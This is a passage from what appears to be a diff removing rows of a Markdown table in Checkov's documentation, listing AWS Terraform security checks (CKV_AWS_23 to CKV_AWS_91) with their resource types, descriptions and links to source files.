-|   72 | CKV_AWS_23      | resource | aws_db_security_group                                   | Ensure every security groups rule has a description                                                                                                                                                      | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|   73 | CKV_AWS_23      | resource | aws_elasticache_security_group                          | Ensure every security groups rule has a description                                                                                                                                                      | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|   74 | CKV_AWS_23      | resource | aws_redshift_security_group                             | Ensure every security groups rule has a description                                                                                                                                                      | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|   75 | CKV_AWS_23      | resource | aws_security_group                                      | Ensure every security groups rule has a description                                                                                                                                                      | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|   76 | CKV_AWS_23      | resource | aws_security_group_rule                                 | Ensure every security groups rule has a description                                                                                                                                                      | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|   77 | CKV_AWS_23      | resource | aws_vpc_security_group_egress_rule                      | Ensure every security groups rule has a description                                                                                                                                                      | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|   78 | CKV_AWS_23      | resource | aws_vpc_security_group_ingress_rule                     | Ensure every security groups rule has a description                                                                                                                                                      | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|   79 | CKV_AWS_24      | resource | aws_security_group                                      | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                   |
-|   80 | CKV_AWS_24      | resource | aws_security_group_rule                                 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                   |
-|   81 | CKV_AWS_24      | resource | aws_vpc_security_group_ingress_rule                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                   |
-|   82 | CKV_AWS_25      | resource | aws_security_group                                      | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                               |
-|   83 | CKV_AWS_25      | resource | aws_security_group_rule                                 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                               |
-|   84 | CKV_AWS_25      | resource | aws_vpc_security_group_ingress_rule                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                               |
-|   85 | CKV_AWS_26      | resource | aws_sns_topic                                           | Ensure all data stored in the SNS topic is encrypted                                                                                                                                                     | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py)                                                                                   |
-|   86 | CKV_AWS_27      | resource | aws_sqs_queue                                           | Ensure all data stored in the SQS queue is encrypted                                                                                                                                                     | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py)                                                                                   |
-|   87 | CKV_AWS_28      | resource | aws_dynamodb_table                                      | Ensure DynamoDB point in time recovery (backup) is enabled                                                                                                                                               | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py)                                                                                       |
-|   88 | CKV_AWS_29      | resource | aws_elasticache_replication_group                       | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest                                                                                                                | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py)                                 |
-|   89 | CKV_AWS_30      | resource | aws_elasticache_replication_group                       | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit                                                                                                             | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py)                           |
-|   90 | CKV_AWS_31      | resource | aws_elasticache_replication_group                       | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token                                                                                          | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py)         |
-|   91 | CKV_AWS_32      | resource | aws_ecr_repository_policy                               | Ensure ECR policy is not set to public                                                                                                                                                                   | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py)                                                                                                     |
-|   92 | CKV_AWS_33      | resource | aws_kms_key                                             | Ensure KMS key policy does not contain wildcard (*) principal                                                                                                                                            | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py)                                                                         |
-|   93 | CKV_AWS_34      | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS                                                                                                                                      | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py)                                                       |
-|   94 | CKV_AWS_35      | resource | aws_cloudtrail                                          | Ensure CloudTrail logs are encrypted at rest using KMS CMKs                                                                                                                                              | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py)                                                                 |
-|   95 | CKV_AWS_36      | resource | aws_cloudtrail                                          | Ensure CloudTrail log file validation is enabled                                                                                                                                                         | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py)                                                                         |
-|   96 | CKV_AWS_37      | resource | aws_eks_cluster                                         | Ensure Amazon EKS control plane logging is enabled for all log types                                                                                                                                     | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py)                                                                           |
-|   97 | CKV_AWS_38      | resource | aws_eks_cluster                                         | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0                                                                                                                                            | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py)                                                                                 |
-|   98 | CKV_AWS_39      | resource | aws_eks_cluster                                         | Ensure Amazon EKS public endpoint disabled                                                                                                                                                               | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py)                                                                                         |
-|   99 | CKV_AWS_40      | resource | aws_iam_policy_attachment                               | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                         |
-|  100 | CKV_AWS_40      | resource | aws_iam_user_policy                                     | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                         |
-|  101 | CKV_AWS_40      | resource | aws_iam_user_policy_attachment                          | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py)                                                         |
-|  102 | CKV_AWS_41      | provider | aws                                                     | Ensure no hard coded AWS access key and secret key exists in provider                                                                                                                                    | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py)                                                                                                 |
-|  103 | CKV_AWS_42      | resource | aws_efs_file_system                                     | Ensure EFS is securely encrypted                                                                                                                                                                         | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py)                                                                               |
-|  104 | CKV_AWS_43      | resource | aws_kinesis_stream                                      | Ensure Kinesis Stream is securely encrypted                                                                                                                                                              | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py)                                                                 |
-|  105 | CKV_AWS_44      | resource | aws_neptune_cluster                                     | Ensure Neptune storage is securely encrypted                                                                                                                                                             | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py)                                                           |
-|  106 | CKV_AWS_45      | resource | aws_lambda_function                                     | Ensure no hard-coded secrets exist in lambda environment                                                                                                                                                 | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py)                                                               |
-|  107 | CKV_AWS_46      | resource | aws_instance                                            | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                           |
-|  108 | CKV_AWS_46      | resource | aws_launch_configuration                                | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                           |
-|  109 | CKV_AWS_46      | resource | aws_launch_template                                     | Ensure no hard-coded secrets exist in EC2 user data                                                                                                                                                      | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py)                                                                                           |
-|  110 | CKV_AWS_47      | resource | aws_dax_cluster                                         | Ensure DAX is encrypted at rest (default is unencrypted)                                                                                                                                                 | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py)                                                                                             |
-|  111 | CKV_AWS_48      | resource | aws_mq_broker                                           | Ensure MQ Broker logging is enabled                                                                                                                                                                      | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py)                                                                                         |
-|  112 | CKV_AWS_49      | data     | aws_iam_policy_document                                 | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py)                                                                           |
-|  113 | CKV_AWS_50      | resource | aws_lambda_function                                     | X-Ray tracing is enabled for Lambda                                                                                                                                                                      | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py)                                                                                     |
-|  114 | CKV_AWS_51      | resource | aws_ecr_repository                                      | Ensure ECR Image Tags are immutable                                                                                                                                                                      | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py)                                                                                       |
-|  115 | CKV_AWS_53      | resource | aws_s3_bucket_public_access_block                       | Ensure S3 bucket has block public ACLS enabled                                                                                                                                                           | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py)                                                                                     |
-|  116 | CKV_AWS_54      | resource | aws_s3_bucket_public_access_block                       | Ensure S3 bucket has block public policy enabled                                                                                                                                                         | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py)                                                                                 |
-|  117 | CKV_AWS_55      | resource | aws_s3_bucket_public_access_block                       | Ensure S3 bucket has ignore public ACLs enabled                                                                                                                                                          | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py)                                                                                   |
-|  118 | CKV_AWS_56      | resource | aws_s3_bucket_public_access_block                       | Ensure S3 bucket has 'restrict_public_buckets' enabled                                                                                                                                                   | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py)                                                                         |
-|  119 | CKV_AWS_57      | resource | aws_s3_bucket                                           | S3 Bucket has an ACL defined which allows public WRITE access.                                                                                                                                           | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml)                                                                               |
-|  120 | CKV_AWS_57      | resource | aws_s3_bucket_acl                                       | S3 Bucket has an ACL defined which allows public WRITE access.                                                                                                                                           | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml)                                                                               |
-|  121 | CKV_AWS_58      | resource | aws_eks_cluster                                         | Ensure EKS Cluster has Secrets Encryption Enabled                                                                                                                                                        | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py)                                                                               |
-|  122 | CKV_AWS_59      | resource | aws_api_gateway_method                                  | Ensure there is no open access to back-end resources through API                                                                                                                                         | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py)                                                                         |
-|  123 | CKV_AWS_60      | resource | aws_iam_role                                            | Ensure IAM role allows only specific services or principals to assume it                                                                                                                                 | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py)                                                                     |
-|  124 | CKV_AWS_61      | resource | aws_iam_role                                            | Ensure AWS IAM policy does not allow assume role permission across all services                                                                                                                          | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py)                                                             |
-|  125 | CKV_AWS_62      | resource | aws_iam_group_policy                                    | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  126 | CKV_AWS_62      | resource | aws_iam_policy                                          | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  127 | CKV_AWS_62      | resource | aws_iam_role_policy                                     | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  128 | CKV_AWS_62      | resource | aws_iam_user_policy                                     | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  129 | CKV_AWS_62      | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py)                                                                           |
-|  130 | CKV_AWS_63      | resource | aws_iam_group_policy                                    | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  131 | CKV_AWS_63      | resource | aws_iam_policy                                          | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  132 | CKV_AWS_63      | resource | aws_iam_role_policy                                     | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  133 | CKV_AWS_63      | resource | aws_iam_user_policy                                     | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  134 | CKV_AWS_63      | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure no IAM policies documents allow "*" as a statement's actions                                                                                                                                      | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py)                                                                 |
-|  135 | CKV_AWS_64      | resource | aws_redshift_cluster                                    | Ensure all data stored in the Redshift cluster is securely encrypted at rest                                                                                                                             | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py)                                                                     |
-|  136 | CKV_AWS_65      | resource | aws_ecs_cluster                                         | Ensure container insights are enabled on ECS cluster                                                                                                                                                     | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py)                                                                 |
-|  137 | CKV_AWS_66      | resource | aws_cloudwatch_log_group                                | Ensure that CloudWatch Log Group specifies retention days                                                                                                                                                | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py)                                                                 |
-|  138 | CKV_AWS_67      | resource | aws_cloudtrail                                          | Ensure CloudTrail is enabled in all Regions                                                                                                                                                              | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py)                                                                             |
-|  139 | CKV_AWS_68      | resource | aws_cloudfront_distribution                             | CloudFront Distribution should have WAF enabled                                                                                                                                                          | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py)                                                                                                   |
-|  140 | CKV_AWS_69      | resource | aws_mq_broker                                           | Ensure MQ Broker is not publicly exposed                                                                                                                                                                 | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py)                                                                   |
-|  141 | CKV_AWS_70      | resource | aws_s3_bucket                                           | Ensure S3 bucket does not allow an action with any Principal                                                                                                                                             | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py)                                                                               |
-|  142 | CKV_AWS_70      | resource | aws_s3_bucket_policy                                    | Ensure S3 bucket does not allow an action with any Principal                                                                                                                                             | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py)                                                                               |
-|  143 | CKV_AWS_71      | resource | aws_redshift_cluster                                    | Ensure Redshift Cluster logging is enabled                                                                                                                                                               | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py)                                                                           |
-|  144 | CKV_AWS_72      | resource | aws_sqs_queue_policy                                    | Ensure SQS policy does not allow ALL (*) actions.                                                                                                                                                        | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py)                                                                                                     |
-|  145 | CKV_AWS_73      | resource | aws_api_gateway_stage                                   | Ensure API Gateway has X-Ray Tracing enabled                                                                                                                                                             | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py)                                                                                           |
-|  146 | CKV_AWS_74      | resource | aws_docdb_cluster                                       | Ensure DocumentDB is encrypted at rest (default is unencrypted)                                                                                                                                          | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py)                                                                                         |
-|  147 | CKV_AWS_75      | resource | aws_globalaccelerator_accelerator                       | Ensure Global Accelerator accelerator has flow logs enabled                                                                                                                                              | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py)                                               |
-|  148 | CKV_AWS_76      | resource | aws_api_gateway_stage                                   | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py)                                                                         |
-|  149 | CKV_AWS_76      | resource | aws_apigatewayv2_stage                                  | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py)                                                                         |
-|  150 | CKV_AWS_77      | resource | aws_athena_database                                     | Ensure Athena Database is encrypted at rest (default is unencrypted)                                                                                                                                     | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py)                                                                       |
-|  151 | CKV_AWS_78      | resource | aws_codebuild_project                                   | Ensure that CodeBuild Project encryption is not disabled                                                                                                                                                 | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py)                                                                   |
-|  152 | CKV_AWS_79      | resource | aws_instance                                            | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                           |
-|  153 | CKV_AWS_79      | resource | aws_launch_configuration                                | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                           |
-|  154 | CKV_AWS_79      | resource | aws_launch_template                                     | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                           |
-|  155 | CKV_AWS_80      | resource | aws_msk_cluster                                         | Ensure MSK Cluster logging is enabled                                                                                                                                                                    | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py)                                                                                     |
-|  156 | CKV_AWS_81      | resource | aws_msk_cluster                                         | Ensure MSK Cluster encryption in rest and transit is enabled                                                                                                                                             | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py)                                                                               |
-|  157 | CKV_AWS_82      | resource | aws_athena_workgroup                                    | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                               |
-|  158 | CKV_AWS_83      | resource | aws_elasticsearch_domain                                | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                         |
-|  159 | CKV_AWS_83      | resource | aws_opensearch_domain                                   | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                         |
-|  160 | CKV_AWS_84      | resource | aws_elasticsearch_domain                                | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                   |
-|  161 | CKV_AWS_84      | resource | aws_opensearch_domain                                   | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                   |
-|  162 | CKV_AWS_85      | resource | aws_docdb_cluster                                       | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py)                                                                                               |
-|  163 | CKV_AWS_86      | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution has Access Logging enabled                                                                                                                                                | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py)                                                             |
-|  164 | CKV_AWS_87      | resource | aws_redshift_cluster                                    | Redshift cluster should not be publicly accessible                                                                                                                                                       | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py)                                                         |
-|  165 | CKV_AWS_88      | resource | aws_instance                                            | EC2 instance should not have public IP.                                                                                                                                                                  | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py)                                                                                                 |
-|  166 | CKV_AWS_88      | resource | aws_launch_template                                     | EC2 instance should not have public IP.                                                                                                                                                                  | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py)                                                                                                 |
-|  167 | CKV_AWS_89      | resource | aws_dms_replication_instance                            | DMS replication instance should not be publicly accessible                                                                                                                                               | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                                       |
-|  168 | CKV_AWS_90      | resource | aws_docdb_cluster_parameter_group                       | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py)                                                                                                       |
-|  169 | CKV_AWS_91      | resource | aws_alb                                                 | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py)                                                                                         |
